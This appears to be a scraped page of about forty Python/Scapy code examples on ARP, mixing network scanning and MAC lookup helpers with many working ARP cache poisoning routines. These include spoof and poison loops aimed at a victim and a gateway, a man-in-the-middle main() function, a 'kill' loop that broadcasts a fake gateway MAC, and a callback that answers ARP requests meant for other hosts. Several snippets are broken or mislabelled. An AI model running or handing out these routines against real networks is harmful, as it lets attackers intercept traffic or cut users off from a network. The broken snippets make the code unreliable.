Example #1
0
    def run(self):

        debug('ARP cache poisoning thread waiting for victims...')
        ip = q.get()
        debug('Acquired first victim... %s' % ip)

        pe = Ether(src=self.mac, dst=self.rmac)
        pa = ARP(op='who-has', hwsrc=self.mac, psrc=ip, pdst=ip, hwdst=self.rmac)

        oldmac = self.whohas(ip)
        oldip = ip

        while True:
            try:
                ip = q.get_nowait()
                if oldmac is not None:
                    debug('Healing victim %s/%s' % (oldip, oldmac))
                    pa.psrc = oldip
                    pa.hwsrc = oldmac
                    sendp(pe/pa, verbose=0)
                if ip is None:
                    break
                else:
                    debug('Changing victim to %s...' % ip)
                    pa.psrc = ip
                    pa.hwsrc = self.mac
                    oldip = ip
                    oldmac = self.whohas(ip)
            except Empty:
                # Send the poison... all your base are belong to us!
                sendp(pe/pa, verbose=0)
                sleep(1/self.poison_rate)
Example #2
0
def spoof(from_ip, to_ip, spoofed_mac, hwdest=None):
    if not hwdest:
        ## Broadcast if the mac address can't be retrieved
        hwdest = getMacAddress(to_ip) or "ff:ff:ff:ff:ff:ff"
    packet = ARP()
    packet.hwdest = hwdest
    packet.pdst = to_ip
    packet.hwsrc = spoofed_mac
    packet.psrc = from_ip
    send(packet, verbose=0)
    return hwdest
Example #3
0
 def __init__(self, ip, mac):
     ether = Ether()
     ether.src = mac # Default: network card mac
     
     arp = ARP()
     arp.op = arp.is_at
     arp.psrc = ip
     arp.hwsrc = mac
     
     self.arp = arp
     self.ether = ether
Example #4
0
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
    if targets is not list:
        targets = [targets]
    a = ARP()
    a.psrc = gateway_ip
    a.hwsrc = "2b:2b:2b:2b:2b:2b"
    a.hwdst = "ff:ff:ff:ff:ff:ff"

    while True:
        for target in targets:
            a.pdst = target
            send(a)
        if not nloop:
            break
Example #5
0
    def run(self):

        debug('ARP cache poisoning thread waiting for victims...')
        ip = q.get()
        debug('Acquired first victim... %s' % ip)

        pe = Ether(src=self.mac, dst=self.rmac)
        pa = ARP(op='is-at', hwsrc=self.mac, psrc=ip, hwdst=self.rmac)

        while True:
            try:
                ip = q.get_nowait()
                if ip is None:
                    break
                else:
                    debug('Changing victim to %s...' % ip)
                    pa.psrc = ip
            except Empty:
                # Send the poison... all your base are belong to us!
                sendp(pe/pa, verbose=0)
                sleep(1/self.poison_rate)
Example #6
0
def arp_scan(iface, ip):
    print("[+] Scan started")
    conf.verb = 0
    broadcast = "ff:ff:ff:ff:ff:ff"
    ether_layer = Ether(dst=broadcast)
    arp_layer = ARP(pdst=ip)
    packet = ether_layer / arp_layer
    ans, unans = srp(packet, iface=iface, timeout=5, inter=0.1)
    for sent, recieved in ans:
        recieved_ip = recieved[ARP].psrc
        recieved_mac = recieved[Ether].src
        print("IP= ", recieved_ip, "MAC= ", recieved_mac, "Discovered")
    print("[+] Scan completed")
Example #7
0
def unspoof(device, pretended):
    '''
        Send an ARP packet with the right MAC address of the spoofed IP, to
        hide your MAC address after the execution.
    '''

    arp_response = ARP(op=2,
                       pdst=device,
                       hwdst=get_mac(device),
                       psrc=pretended,
                       hwsrc=get_mac(pretended))

    send(arp_response, verbose=False)
Example #8
0
def restore(target_ip, host_ip):
    # GET HARDWARE ADDRESS OF TARGET
    target_mac = get_mac(target_ip)
    # GET HARDWARE ADDRESS OF HOST
    host_mac = get_mac(host_ip)
    # CRAFT ARP RESPONSE PACKET TO RESTORE
    arp_response = ARP(pdst=target_ip,
                       hwdst=target_mac,
                       psrc=host_ip,
                       hwsrc=host_mac)
    # SEND THE RESTORE PACKET
    send(arp_response, verbose=0, count=5)
    print("(UN) SPOOFED " + target_ip + ": " + host_ip + " is-at " + host_mac)
Example #9
0
def get_ip_from_mac(interface, cidr, mac):
    """

    """
    if interface is None or cidr is None:
        return None
    if mac is None:
        results = {}
        packet = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=cidr)
    else:
        packet = Ether(dst=mac) / ARP(pdst=cidr)
    ans, unans = srp(packet, timeout=2, iface=interface, verbose=False)
    for s, r in ans:
        currentmac = r.sprintf("%Ether.src%")
        if mac is None:
            results[currentmac] = r.sprintf("%ARP.psrc%")
        elif currentmac == mac:
            return r.sprintf("%ARP.psrc%")
    if mac is None:
        return yaml.dump(results)
    else:
        return None
Example #10
0
    def _packet_handler(self, pkt):
        """This method is called for each packet received through scapy's sniff function.
        Incoming ARP requests are used to spoof involved devices.

        Args:
            pkt (str): Received packet via scapy's sniff (through socket.recv).
        """
        # when ARP request
        if pkt[ARP].op == 1:

            # packets intended for this machine (upribox)
            if pkt[Ether].dst == self.ip.mac:
                # incoming packets(that are sniffed): Windows correctly fills in the hwdst, linux (router) only 00:00:00:00:00:00
                # this answers packets asking if we are the gateway (directly not via broadcast)
                # Windows does this 3 times before sending a broadcast request
                sendp(
                    Ether(dst=pkt[Ether].src) / ARP(op=2,
                                                    psrc=pkt[ARP].pdst,
                                                    pdst=pkt[ARP].psrc,
                                                    hwdst=pkt[ARP].hwsrc,
                                                    hwsrc=self.ip.mac))

            # broadcast request to gateway
            elif pkt[Ether].dst.lower() == util.hex2str_mac(
                    ETHER_BROADCAST) and (pkt[ARP].pdst == self.ip.gateway):
                # pkt[ARP].psrc == self.gateway or

                # spoof transmitter
                packets = [
                    Ether(dst=pkt[Ether].src) / ARP(op=2,
                                                    psrc=pkt[ARP].pdst,
                                                    pdst=pkt[ARP].psrc,
                                                    hwsrc=self.ip.mac,
                                                    hwdst=pkt[ARP].hwsrc)
                ]

                # some os didn't accept an answer immediately (after sending the first ARP request after boot
                # so, send packets after some delay
                threading.Timer(self._DELAY, sendp, [packets]).start()
Example #11
0
def spoof(target_ip, host_ip, my_mac):
    """Spoofs `target_ip` saying that we are `host_ip`

    Args:
        target_ip (string): The ip's victim
        host_ip (string): Your ip address
    """

    # craft the arp 'who-has' operation packet, in other words: an ARP response
    arp_response = Ether() / ARP(
        op='who-has', hwsrc=my_mac, pdst=target_ip, psrc=host_ip)
    sendp(arp_response, verbose=0)
    print(".", end=" ", flush=True)
Example #12
0
def spoof(target_ip, host_ip, verbose=True):
    """
	Spoofs 'target_ip' saying that we are 'host_ip'
	it is accomplished by changing the ARP cache of the target (poisoning)
	"""
    # get the mac address of the target
    target_mac = get_mac(target_ip)
    # craft the arp 'is-at' operation packet, in other words; an ARP response
    # we don't specifiy 'hwsrc' (source MAC address)
    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
    arp_response = ARP(pdst=target_ip,
                       hwdst=target_mac,
                       psrc=host_ip,
                       op='is-at')
    # send the packet
    # verbose = 0 means that we send the packet without printing anything
    send(arp_response, verbose=0)
    if verbose:
        # get the MAC address of the default interface we are using
        self_mac = ARP().hwsrc
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip,
                                                    self_mac))
Example #13
0
 def retrieve_arp_mac(self):
     '''
     Auto constructor
     @param (ip_address, type=string) - Target IP address
     @return bytarray/string
     '''
     cfg = Config()
     mac_address, ax = srp(Ether(dst=cfg.ESPI_MAC_ADDRESS_FORMAT) /
                           ARP(pdst=self.ip_address),
                           timeout=3,
                           verbose=0)
     if mac_address:
         return mac_address[0][1].src
Example #14
0
    def netscan_scapy(dev):
        network = ifconfig.getAddr(dev)
        netmask = ifconfig.getMask(dev)
        netsize = netmask2netsz(netmask)

        ans, unans = srp(
            Ether(dst="ff:ff:ff:ff:ff:ff") / \
                ARP(pdst="{0}/{1}".format(network, netsize)),
                    timeout=0.1, iface=dev)

        for request, responce in ans:
            yield responce.payload.fields['hwsrc'].upper(
            ), responce.payload.fields['psrc']
Example #15
0
def arp_poison_callback(packet):
    # Got ARP request?
    if packet[ARP].op == 1:
        answer = Ether(dst=packet[ARP].hwsrc) / ARP()
        answer[ARP].op = "is-at"
        answer[ARP].hwdst = packet[ARP].hwsrc
        answer[ARP].psrc = packet[ARP].pdst
        answer[ARP].pdst = packet[ARP].psrc

        print "Envenenando a la " + packet[ARP].psrc + " diciendo que " + \
              packet[ARP].pdst + " soy yo"

        sendp(answer, iface=sys.argv[1])
Example #16
0
def restore(target_ip, host_ip, verbose=True):
    target_mac = get_mac(target_ip)
    host_mac = get_mac(host_ip)
    arp_response = ARP(pdst=target_ip,
                       hwdst=target_mac,
                       psrc=host_ip,
                       hwsrc=host_mac)
    send(arp_response, verbose=0, count=7)
    if verbose:
        if language == "English":
            print(f"[+] Sent to {target_ip} : {host_ip} is-at {host_mac}")
        else:
            print(f"[+] Inviato a {target_ip} : {host_ip} is-at {host_mac}")
def arp_poision_callback(packet):
    # 也就是说我能收到arp包,然后给出回应,
    if packet[ARP].op == 1:
        answer = Ether(dst=packet[ARP].hwsrc) / ARP()
        answer[ARP].op = 'is-at'
        answer[ARP].hwdst = packet[ARP].hwsrc
        answer[ARP].psrc = packet[ARP].pdst
        answer[ARP].pdst = packet[ARP].psrc

        print('fooling' + packet[ARP].psrc + 'that' + packet[ARP].pdst +
              'is me')

        sendp(answer, iface='en0')
Example #18
0
def arp_poison_loop():
    print('poisoning started')
    try:
        while True:
            arp_poison(routerIP, routerMAC, victimIP, victimMAC)
            time.sleep(2)
    except KeyboardInterrupt:
        print("restoring")
        arp_victim = ARP(pdst=victimIP,
                         hwdst=victimMAC,
                         psrc=routerIP,
                         hwsrc=routerMAC,
                         op='is-at')
        send(arp_victim)
        arp_router = ARP(pdst=routerIP,
                         hwdst=routerMAC,
                         psrc=victimIP,
                         hwsrc=victimMAC,
                         op='is-at')
        send(arp_router)
        disable_forward()
        print("restored")
Example #19
0
def arp_poison_callback(packet):
    # Got ARP request?
    if packet[ARP].op == 1:
        answer = Ether(dst0packet[ARP].hwsrc) / ARP()
        answer[ARP].op = "is-at"
        answer[ARP].hwdst = packet[ARP].hwsrc
        answer[ARP].psrc = packet[ARP].pdst
        answer[ARP].pdst = packet[ARP].psrc 

        print "Fooling " + packet[ARP].psrc + " that " + \ 
              packet[ARP].pdst + " is me"

        sendp(answer, iface=sys.argv[1])
Example #20
0
 def restore(self, delay, target_b=None):
     if not target_b:
         target_b = self.gateway
     src_mac = ':'.join(
         a + b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
     if not isinstance(self.target, list):
         dst_mac = utils.get_mac_by_ip(self.target)
         send(ARP(op=2,
                  pdst=target_b,
                  psrc=self.target,
                  hwdst="ff:" * 5 + "ff",
                  hwsrc=dst_mac),
              count=3,
              verbose=False)
         send(ARP(op=2,
                  pdst=self.target,
                  psrc=target_b,
                  hwdst="ff:" * 5 + "ff",
                  hwsrc=src_mac),
              count=3,
              verbose=False)
     else:
         for addr in self.target:
             dst_mac = utils.get_mac_by_ip(addr)
             send(ARP(op=2,
                      pdst=target_b,
                      psrc=addr,
                      hwdst="ff:" * 5 + "ff",
                      hwsrc=dst_mac),
                  count=3,
                  verbose=False)
             send(ARP(op=2,
                      pdst=addr,
                      psrc=target_b,
                      hwdst="ff:" * 5 + "ff",
                      hwsrc=src_mac),
                  count=3,
                  verbose=False)
Example #21
0
		def spoof(target_ip, host_ip, verbose=True):
		    """
		    Spoofs `target_ip` saying that we are `host_ip`.
		    it is accomplished by changing the ARP cache of the target (poisoning)
		    """
		    # get the mac address of the target
		    target_mac = get_mac(target_ip)
		    # craft the arp 'is-at' operation packet, in other words; an ARP response
		    # we don't specify 'hwsrc' (source MAC address)
		    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
		    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
		    # send the packet
		    # verbose = 0 means that we send the packet without printing any thing
		    send(arp_response, verbose=0)
		    if verbose:
		        # get the MAC address of the default interface we are using
		        self_mac = ARP().hwsrc
		        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))


		        def restore(target_ip, host_ip, verbose=True):
		            """
		            Restores the normal process of a regular network
		            This is done by sending the original informations 
		            (real IP and MAC of `host_ip` ) to `target_ip`
		            """
		            # get the real MAC address of target
		            target_mac = get_mac(target_ip)
		            # get the real MAC address of spoofed (gateway, i.e router)
		            host_mac = get_mac(host_ip)
		            # crafting the restoring packet
		            arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
		            # sending the restoring packet
		            # to restore the network to its normal process
		            # we send each reply seven times for a good measure (count=7)
		            send(arp_response, verbose=0, count=7)
		            if verbose:
		                print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
Example #22
0
def arpspoof_via_scapy(impersonated_host, victim_ip):
    from scapy.all import ARP,IP,send,srp,sr1,conf

    # Note that we're using scapy, so the ARP spoof shutdown code knows it needs to send
    # corrective ARP replies.
    ml.arpspoof_via_scapy = 1

    pid = os.fork()
    if pid:
        ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % pid)
        # Let's add this process to a list of child processes that we will need to
        # explicitly shut down.

        ml.child_pids_to_shutdown.append(pid)

    else:
        # Turn off scapy's verbosity?
        conf.verb=0

        # Build an ARP response to set up spoofing
        arp_response = ARP()
        # define a constant for ARP responses
        const_ARP_RESPONSE = 2
        # Set the type to a ARP response
        arp_response.op = const_ARP_RESPONSE
        # Hardware address we want to claim the packet
        arp_response.hwsrc = ml.my_mac
        # IP address we want to map to that address
        arp_response.psrc = impersonated_host

        # Now set the ARP response target
        non_broadcast=0
        if non_broadcast:

            # MAC address and IP address of our victim
            arp_response.hwdst = lookup_mac_via_scapy(victim_ip)
            arp_response.pdst = victim_ip
        else:
            arp_response.hwdst = "ff:ff:ff:ff:ff:ff"
            arp_response.pdst = ml.my_broadcast

        # Issue the ARP response every 5 seconds
        while(1):
            send(arp_response)
            sleep(3)

        print "Arpspoofing dying"
        exit
Example #23
0
    def ARPing(self):

        victimMAC = self.mac_getter(self.victimIP)
        AP_MAC = self.mac_getter(self.gatewayIP)

        # Creating and sending ARP packets for try to hide the attack
        send(ARP(op=2,
                 pdst=self.victimIP,
                 psrc=self.gatewayIP,
                 hwdst="ff:ff:ff:ff:ff:ff",
                 hwsrc=AP_MAC),
             count=10)
        send(ARP(op=2,
                 pdst=self.gatewayIP,
                 psrc=self.victimIP,
                 hwdst="ff:ff:ff:ff:ff:ff",
                 hwsrc=victimMAC),
             count=10)

        # Disabling IP Forwarding
        os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")

        exit()
 def __scanNetworkScapy(self, ip):
     """Arping function takes IP Address or Network, returns nested ip/mac list"""
     machines = []
     try:
         ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                          timeout=2,
                          verbose=False)
         for snd, rcv in ans:
             result = ((
                 rcv.sprintf(r"%ARP.psrc% %Ether.src%")).upper().split())
             machines.append(result)
     except:
         pass
     return sorted(machines, key=lambda machines: machines[1])
Example #25
0
def build_arp_ns_pkt(family, smac, src_ip, dst_ip):
    if family == 'IPv4':
        eth = Ether(src=smac, dst='ff:ff:ff:ff:ff:ff')
        pkt = eth/ARP(op='who-has', pdst=dst_ip)
    elif family == 'IPv6':
        nsma = in6_getnsma(inet_pton(AF_INET6, dst_ip))
        mcast_dst_ip = inet_ntop(AF_INET6, nsma)
        dmac = in6_getnsmac(nsma)
        eth = Ether(src=smac,dst=dmac)
        ipv6 = IPv6(src=src_ip, dst=mcast_dst_ip)
        ns = ICMPv6ND_NS(tgt=dst_ip)
        ns_opt = ICMPv6NDOptSrcLLAddr(lladdr=smac)
        pkt = eth/ipv6/ns/ns_opt
    return pkt
Example #26
0
def arp_scan(ip):
    config = load_config()

    interface = config['arpConfig']['interface']
    conf.verb = 0
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst = ip),
                 timeout = 2,
                 iface = interface,
                 inter = 0.1)

    for snd, rcv in ans:
        mac_addr = rcv.sprintf(r"%Ether.src%")

    return mac_addr
Example #27
0
            def bbb(xx_ip):
                a = ARP(pdst=xx_ip)
                b = sr1(a, verbose=False, timeout=2)
                if b:
                    print('\033[36m[O] 开始扫描,正在扫描中...\033[0m')
                    #print(int(data['comes'])+1)
                    for i in range(1, int(data['comes']) + 1):
                        t = Thread(target=ccc, args=(xx_ip, int(i)))
                        t.start()
                        sleep(0.0001)

                else:
                    print('\033[31m[X] E: ip XX??\033[0m')
                    fe = 1
    def arp_ping(self, destination):
        """
        The fastest way to discover hosts on a local
        ethernet network is to use the ARP Ping method.

        -- https://scapy.readthedocs.io/en/latest/usage.html#arp-ping

        :param destination: Network to scan.
        :param delay: How long to delay before starting the network scan.
        """
        log.info('Sending ARP ping request to {destination}'.format(**locals()))
        # "srp" means: Send and receive packets at layer 2.
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=destination), timeout=10, verbose=self.VERBOSITY)
        return ans, unans
Example #29
0
 def _getMacAddress(self, interface, ipAddress):
     f = '\033[91m'
     e = '\033[0m'
     while (True):
         ans, uans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
                         ARP(pdst=ipAddress),
                         timeout=2,
                         iface=interface,
                         verbose=False)
         if (len(ans)): break
         else:
             print(f + "[!] " + ipAddress +
                   "에 대한 MAC 주소를 얻지못했습니다. 잠시후 다시 시도됩니다." + e)
     return ans[0][1].hwsrc
Example #30
0
 def build_req():
     """
       以请求包的方式进行欺骗,目的是欺骗网关,让网关把所有的发给被害主机的数据给为本机发一份,同时被害主机毫无察觉。
     """
     gateway_mac = getmacbyip(args[0])
     if options is None:  # 广播欺骗
         pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(
             hwsrc=mac,
             psrc=options.target,
             hwdst=gateway_mac,
             pdst=args[0],
             op=1)
     elif options.target:  # 定向欺骗
         target_mac = getmacbyip(options.target)
         if target_mac is None:
             print "[-] Error: Could not resolve targets MAC address"
             sys.exit(1)
     pkt = Ether(src=mac, dst=gateway_mac) / ARP(hwsrc=mac,
                                                 psrc=options.target,
                                                 hwdst=gateway_mac,
                                                 pdst=args[0],
                                                 op=1)
     return pkt
Example #31
0
 def _arp_ping(mac_address, ip_address):
     result = False
     answered, unanswered = srp(Ether(dst=mac_address) /
                                ARP(pdst=ip_address),
                                timeout=1,
                                verbose=False)
     if len(answered) > 0:
         for reply in answered:
             if reply[1].hwsrc == mac_address:
                 if type(result) is not list:
                     result = []
                 result.append(str(reply[1].psrc))
                 result = ', '.join(result)
     return result
def main():

	''' init the parameters '''
	parser = optparse.OptionParser("usage: %prog -v <victimIP> -g <gatewayIP>")
	parser.add_option('-v', dest='victimIP', type='string', help='the specified targate ip')
	parser.add_option('-g', dest='gatewayIP', type='string', help='the specified gateway ip')
	(options, args) = parser.parse_args()
	if (options.victimIP == None) | (options.gatewayIP == None):
		print parser.usage
		exit(0)
	else:
		victimIP = options.victimIP
		gatewayIP = options.gatewayIP

	''' MitM attack '''
	try:
		attackGateway = Ether()/ARP(psrc=victimIP, pdst=gatewayIP)
		attackTarget = Ether()/ARP(psrc=gatewayIP, pdst=victimIP)
		print '[ok]:MitM attack is running'
		sendp(attackGateway, inter=1, loop=1)  # send the data package to the target host circularly
		sendp(attackTarget, inter=1, loop=1)  # send the data package to the gateway circularly
	except:  # except optparser.TypeError as e:
		pass  # print 'error:please enter the correct parameters'
Example #33
0
    def execute(self):
        self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(),
                      verbose=0,
                      timeout=config.network_timeout)[IP].dst
        arp_responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
                               ARP(op=1, pdst=f"{self_ip}/24"),
                               timeout=config.netork_timeout,
                               verbose=0)

        # arp enabled on cluster and more than one pod on node
        if len(arp_responses) > 1:
            # L3 plugin not installed
            if not self.detect_l3_on_host(arp_responses):
                self.publish_event(PossibleArpSpoofing())
Example #34
0
def get_mac_gateway(ip_address):

    response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
        timeout=2, retry=2)

    for s, r in response:
        return r[Ether].src
    return None

    logging.info('Gateway Layer 2 address is: %s' % r[Ether].src)

    global GATEWAY_MAC

    GATEWAY_MAC = "%s" % r[Ether].src
Example #35
0
def arp_poison(gateway_ip, target_ips):
    print("Starting attack... [Ctrl+C to stop]")
    try:
        gateway_mac = target_ips[gateway_ip]
        while True:
            for target_ip in target_ips:
                if target_ip != gateway_ip:
                    target_mac = target_ips[target_ip]
                    send(
                        ARP(op=2,
                            pdst=target_ip,
                            hwdst=target_mac,
                            psrc=gateway_ip,
                            hwsrc=MAC))
                    send(
                        ARP(op=2,
                            pdst=gateway_ip,
                            hwdst=gateway_mac,
                            psrc=target_ip,
                            hwsrc=MAC))
    except KeyboardInterrupt:
        print("Attack interrupted. Restoring network...")
        restoreNetwork(gateway_ip, target_ips)
Example #36
0
def get_mac(ip, interface):
    """Returns the according MAC address for the provided IP address.

    Args:
        ip (str): IP address used to get MAC address.
        interface (str): Interface used to send ARP reuest.

    Results:
        According MAC address as string (11:22:33:44:55:66)
        or None if no answer has been received.
    """
    ans, unans = srp(Ether(dst=ETHER_BROADCAST) / ARP(pdst=ip), timeout=2, iface=interface, inter=0.1, verbose=0)
    for snd, rcv in ans:
        return rcv.sprintf(r"%Ether.src%")
    def poison_target(self):

        target_poison_packet = ARP()
        target_poison_packet.op = 2
        target_poison_packet.psrc = self._arg["gateway_ip"]
        target_poison_packet.pdst = self._arg["target_ip"]
        target_poison_packet.hwdst = self._arg["target_mac"]

        gateway_poison_packet = ARP()
        gateway_poison_packet.op = 2
        gateway_poison_packet.psrc = self._arg["target_ip"]
        gateway_poison_packet.pdst = self._arg["gateway_ip"]
        gateway_poison_packet.hwdst = self._arg["gateway_mac"]

        self.poisoning = True

        print("[*] Beginning the ARP poison. [CTRL-C to stop]")

        while self.poisoning:
            send(target_poison_packet)
            send(gateway_poison_packet)
            time.sleep(2)

        print("[*] ARP poison attack finished")
Example #38
0
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
    ether = Ether()
    ether.src = my_mac

    arp = ARP()
    arp.psrc = gateway_ip
    arp.hwsrc = my_mac

    arp = arp
    arp.pdst = target_ip
    arp.hwdst = target_mac

    ether = ether
    ether.src = my_mac
    ether.dst = target_mac

    arp.op = 2

    def broadcastPacket():
        packet = ether / arp
        sendp(x=packet, verbose=False)

    broadcastPacket()
Example #39
0
def arp_hack(mac, ip):
    p = ARP(op=2, hwsrc=GATEWAY_MAC, psrc=GATEWAY_IP)
    p.hwdst = mac
    p.pdst = ip
    send(p)
Example #40
0
#!/usr/bin/python

import sys
from scapy.all import ARP,send
a=ARP()
a.hwsrc="aa:aa:aa:aa:aa:aa"
#a.psrc="192.168.1.93"
#a.hwdst="d4:be:d9:dc:4c:20"
#a.pdst="192.168.1.12"
#a.hwdst="00:00:00:00:00:00"
#a.pdst="0.0.0.0"
a.psrc="0.0.0.0"
a.hwdst="ff:ff:ff:ff:ff:ff"
a.pdst="255.255.255.255"
send(a)